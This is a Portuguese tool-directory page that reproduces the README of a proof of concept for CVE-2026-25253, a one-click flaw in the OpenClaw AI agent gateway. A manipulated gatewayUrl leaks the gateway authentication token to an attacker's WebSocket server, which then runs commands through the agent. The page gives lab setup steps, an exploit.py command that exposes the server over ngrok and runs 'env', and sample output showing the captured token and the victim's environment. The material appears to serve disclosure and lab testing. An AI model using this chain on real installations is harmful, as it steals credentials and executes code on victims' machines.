Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-25253 — OpenClaw Authentication Token Exfiltration | Kitploit
Ferramentas/GitHubGitHub/eqstlab/cve-2026-25253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

OpenClaw Authentication Token Exfiltration

Ver Repositório
2há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-25253 OpenClaw RCE de 1 Clique

★ CVE-2026-25253 OpenClaw PoC de Execução Remota de Código em 1 Clique ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Descrição

CVE-2026-25253 : Vulnerabilidade de Exfiltração de Token de Autenticação do OpenClaw

descrição: OpenClaw (também conhecido como clawdbot ou Moltbot) anterior a v2026.1.29 permite que atacantes exfiltrem um token de autenticação de gateway armazenado ao fornecer um valor de query-string gatewayUrl manipulado para a Interface de Controle, que estabelece automaticamente uma conexão WebSocket sem validação ou confirmação do usuário. Isso pode levar a acesso não autorizado ao gateway e execução remota de código em 1 clique.

Requisitos

  • Docker (Docker Desktop no Windows)
  • Python 3.x (lado do ataque)

Arquivos

  • Dockerfile — constrói o ambiente vulnerável do OpenClaw
  • templates/ — páginas web maliciosas usadas pelo exploit
  • config.txt — configuração do OpenClaw usada no ambiente da vítima
  • exploit.py — servidor do exploit
  • requirements.txt — dependências do PoC

Configuração do Ambiente

  1. Criar imagem Docker
root@kitploit:~
docker build -t openclaw-vuln .
  1. Executar ambiente (Windows)
root@kitploit:~
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. Criar túnel SSH
root@kitploit:~
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • Senha: openclawlab
  1. Acessar a Interface de Controle do OpenClaw Abra a seguinte URL no navegador
root@kitploit:~
http://127.0.0.1:18789/
  1. Insira o Token do Gateway d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. Clique em Conectar
  3. Abra a aba Config
  4. cole o conteúdo de config.txt
  5. Substitua o campo de chave da API pela sua chave da API OpenAI
  6. Salve a configuração
  7. Confirme que o agente responde normalmente

Prova de Conceito (PoC)

  1. Instalar dependências (lado do ataque)
root@kitploit:~
pip3 install -r requirements.txt
  1. Expor o servidor do exploit via HTTPS
root@kitploit:~
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • Copie o hostname de encaminhamento gerado
  1. Executar servidor do exploit
root@kitploit:~
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

Exemplo:

root@kitploit:~
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. Disparar o ataque
  1. Abra a página maliciosa exposta pelo servidor do exploit
  2. Simule a interação da vítima com a página
  3. Dispare o fluxo do exploit a partir do navegador

Fluxo do Ataque

  1. Uma URL maliciosa altera o gatewayUrl da Interface de Controle da vítima
  2. O navegador se conecta automaticamente ao endpoint WebSocket controlado pelo atacante
  3. O token de autenticação do gateway é vazado para o atacante
  4. A página maliciosa usa o token roubado para abrir uma nova conexão WebSocket com o gateway local do OpenClaw da vítima
  5. Uma requisição de execução de comando é enviada através do agente
  6. O resultado da execução é retornado ao servidor do atacante

Resultado Esperado

  • O navegador da vítima é redirecionado para o fluxo WebSocket malicioso
  • O token de autenticação do gateway é capturado pelo atacante
  • O atacante pode enviar uma requisição de execução de comando através do OpenClaw
  • A saída do comando é retornada ao servidor do atacante

Exemplo de Saída

root@kitploit:~
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

Notas

  • Este PoC tem como alvo o OpenClaw 2026.1.24-1
  • A cadeia de exploração depende do tratamento vulnerável do gatewayUrl na Interface de Controle
  • Para acesso remoto à vítima, a página maliciosa deve ser servida via HTTPS
  • O gateway local do OpenClaw é alcançado através do navegador da vítima como uma ponte

EQST Insight

Publicamos análises de CVEs e malware uma vez por mês. Se estiver interessado, siga os links abaixo para conferir nossas publicações.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
Baixar ferramenta